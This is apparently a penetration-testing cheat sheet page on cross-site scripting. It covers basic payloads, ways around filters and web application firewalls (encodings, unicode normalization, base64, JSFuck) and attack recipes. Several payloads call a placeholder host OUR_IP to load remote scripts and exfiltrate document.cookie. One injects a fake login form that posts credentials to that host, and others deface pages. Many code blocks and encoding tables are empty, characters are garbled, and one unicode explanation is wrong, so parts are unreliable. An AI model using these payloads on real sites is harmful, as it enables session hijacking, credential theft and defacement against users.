Cross Site Scripting (XSS)


Cross-Site Scripting (XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. XSS normally allows an attacker to masquerade as a victim user, carrying out any actions that the user is able to perform and accessing any of the user's data. Source:

XSS Useful References

Awesome labs to train your XSS skills:

XSS Tools

Basic XSS Payloads



Basic XSS Payload


Basic XSS Payload


Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us

XSS Filters & WAFs Evasion

Web Application Firewalls (WAFs) inspect requests, analyse payloads, and apply predefined rule sets to identify and block any malicious traffic.

WAFs can protect web applications by leveraging various techniques such as signature-based pattern matching, behaviour analysis, and anomaly detection.

This section focuses on different methods which could help you bypassing XSS filters, whether they are in place due to the web application's implementation or due to a Web Application Firewall. If you are not sure whether the web application is protected by a WAF, some basic fingerprinting checks you can perform are the following:

  • Use automated tools, such as wafw00f

  • Check if there are cookie values set by the WAF Example: F5 BIG-IP ASM releases cookies starting with TS

  • Server headers or any other uncommon header

  • Sometimes, the HTTP body contains some hints about the WAF in place.

Many more infos and WAF fingerprinting techniques can be found here:

Extra Hints & Tricks

  • If alert() is filtered, a valid (and less filtered) alternative is confirm()

  • You can close tags using // rather than >

  • Sometimes, you can access DOM Objects by just specifying their name. Instead of using document.cookie and document.domain you can use cookie and domain respectively.

  • http(s):// can be shortened to // or /\\ or \\.

  • Quotes are not required as long as you are not using spaces. For example you can use <img src= without specifying any quotes.

  • If all HTML tags are filtered, you can sometimes use custom ones, for example: <22>alert()</22>

Alternative Encodings

If your characters are being filtered, a good starting point is trying the following alternative encodings

CharHTMLNumeric DecimalJS UniCodeNum. HexadecimalCSS (ISO)JS (Octal)URL

















































































































































































































































Basic Bypasses

Whenever facing filters or blacklists on your special characters or javascript payloads, try using the following basic bypasses and alternative representations.

Alert alternatives

If alert('xss') or alert(1) are filtered, try using:

  • prompt('xss') or prompt(1)

  • confirm('xss') or confirm(1)

  • alert(/xss/.source)

  • windows/alert/.source

OnError alternatives

If onerror=alert(1) is filtered, try using:

  • onload=alert(1)

  • onfocus=alert(1) combined with autofocus=true

  • setTimeout(alert(1))

  • setInterval(alert(1))

  • Function(alert(1))()

  • setImmediate(alert(1)) [notice that this only works on IE 10+]

Img tag alternatives

If an img payload such as <img src=x onerror=alert(1)> is filtered, try using:

  • <svg/onload=alert(1)>

  • <video src=x onerror=alert(1)>

  • <audio src=x onerror=alert(1)>

Using Base64 encoded payloads

You can bypass many blacklist-based filters by using Base64-encoded payloads.

Generally speaking, you can generate the Base64-encoding of any payload and use it inside the atob JavaScript function. In particular, just use


You could also use other base64 encoded payloads such as the following alternative to javascript:alert('XSS'): data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

Using JavaScript Unicode Characters

Some filters can be bypassed by using the JavaScript Unicode escape sequences to represent any blacklisted word or character.

For example, if alert is blacklisted, you can use \u0061lert, where \u0061 is the Unicode escape sequence for the lowercase letter a.

A valid payload to bypass the previous blacklist example is: <script>\u0061lert(document.cookie)</script>

To represent the character โ€˜aโ€™ using a Unicode escape sequence, you would use \u0061 because the Unicode code point for 'A' is 0x61 in hexadecimal.

You can use the following JavaScript code in your browserโ€™s console to quickly gain the unicode values you need

let asciiStr = โ€œaโ€;
let unicodeHexStr = asciiStr.split('').map(c => '\\u' + ('000' + c.charCodeAt(0).toString(16)).slice(-4)).join('');

Unicode Normalization

Unicode normalization is a process that ensures different binary representations of characters are standardized to the same binary value. This process is crucial in dealing with strings in programming and data processing

Depending on how the back-end/front-end is behaving when it receives weird unicode characters an attacker might be able to bypass protections and inject arbitrary characters. Indeed, sometimes, unicode normalization even allows bypassing WAFs in place.

You can find find a great article about this topic here:

Two lists of unicode normalized characters can be found at:

I made a tool to help converting characters to their corresponding unicode normalized value, which I suggest to anyone. You can find my helper tool to perform Unicode Normalization here:

If you prefer, you can also find a list of copy-paste unicode normalized characters below:

CharacterUnicode Normalization









%ef%b9%a4 &#xfe64;


%ef%bc%9c &#xff1c;


%e2%89%af &#x226f;


%ef%b9%a5 &#xfe65;


%ef%bc%9e &#xff1e;









Bypass Using JSFuck

JSFuck is an esoteric JavaScript programming language that only uses the following 6 characters to write any JavaScript code: []()!+

The (very) basic idea behind JSFuck is that you can recreate all JavaScript functionalities using such a limited set of characters because JavaScript is a weakly typed programming language, meaning that it allows the evaluation of any expression as any type. If you want to know more about its inner workings, check out this link.

The following represents an alert(1) payload written in JSFuck


Link: GitHub Repo:

XSS Attacks

XSS attacks are not just about popping the alert message containing cookies.

This section describes some alternative attacks you can perform by exploiting XSS vulnerabilities

Open Redirect to XSS

Whenever you are facing a web application which is vulnerable to Open Redirects, it might also be the case that the same vector can be used to gain XSS.

An example might be a website which allows for open redirects by leveraging a GET parameter, such as the following:{value}

Instead of using the standard http or https protocols followed by your attacker website, you might insert a javascript payload as the value of the redirect_url parameter. For example, you could navigate to the following URL to pop an alert:

XSS Session Hijacking

  • Use the following XSS Payload: <script src=http://OUR_IP/script.js></script>

  • On the attacker machine, write one of the following payload inside a file named script.js:

    1. new Image().src='http://OUR_IP/index.php?c='+document.cookie

    2. document.location='http://OUR_IP/index.php?c='+document.cookie;

XSS Phishing

  • A common form of XSS phishing is obtained with stored XSS

  • The attacker can inject a fake login form that sends the credentials to an attacker's server,

  • To perform a Stored XSS phishing attack, we must inject an HTML code that displays a login form on the targeted page.

  • An example of such login form is the following (Note: Change OUR_IP in the payload)

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

XSS Defacing

  • Defacing means changing the website's appearance for anyone who visits the website

  • The website's appearance can be changed using injected Javascript code

  • Note: This requires a stored XSS Vulnerability

Defacing PayloadDescription

<script> = "#141d2b"</script>

Change website background color

<script>document.body.background = ""</script>

Change website background image

<script>document.title = 'New Title'</script>

Change website title

document.getElementById("todo").innerHTML = "New Text"

Change HTML element/DOM text using innerHTML

Last updated